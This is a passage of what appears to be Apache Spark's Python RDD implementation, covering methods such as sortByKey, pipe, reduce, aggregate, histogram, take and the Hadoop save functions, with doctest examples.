Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
        # we have numPartitions many parts but one of them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
Note that this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
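    # Usage sketch (added for illustration; mirrors the doctest style used elsewhere
    # in this file):
    #
    #   >>> sc.parallelize([1, 2, 3, 4], 2).collect()
    #   [1, 2, 3, 4]
    #
    # collect() pulls every partition back to the driver, so prefer take() or
    # takeSample() when the RDD may be large.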
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
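    # Note (added for illustration; not part of the original source): because the
    # zero value is applied once per partition and once more in the final reduce,
    # a non-neutral zero changes the result. For example, fold(1, add) over
    # [1, 2, 3] split into 2 partitions yields 1 + (1 + 1) + (1 + 2 + 3) = 9,
    # not the 7 that a sequential fold with the same zero would give.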
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
        Each function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
        a U and one operation for merging two U's.
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
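    # Illustration (added; not part of the original source): with 100 partitions and
    # the default depth=2, scale = max(ceil(100 ** 0.5), 2) = 10, so the loop above
    # collapses the 100 partial aggregates into 10 before the final reduce on the
    # driver, i.e. one intermediate tree level instead of pulling all 100 partials
    # back at once.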
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
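    # Usage sketch (added for illustration; StatCounter also exposes min(), max(),
    # variance() and stdev()):
    #
    #   >>> s = sc.parallelize([1, 2, 3]).stats()
    #   >>> (s.count(), s.mean())
    #   (3, 2.0)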
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
        which means 1<=x<10, 10<=x<20, 20<=x<=50. For example, for the
        inputs 1 and 50 the resulting histogram would be [1, 0, 1].
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
        this can be switched from an O(log n) insertion to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from a RDD.
Note that this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from a RDD ordered in ascending order or as
specified by the optional key function.
Note that this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
        It works by first scanning one partition, and using the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Note that this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
                    # the first parameter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
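    # Illustration (added; not part of the original source): if the first scanned
    # partition yielded only 2 of the 10 requested items, the next pass would try
    # int(1.5 * 10 * 1 / 2) - 1 = 6 partitions, capped at partsScanned * 4 = 4,
    # so the scan widens in proportion to how sparse the matching rows are.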
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all. Note that an RDD
may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
Note that this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
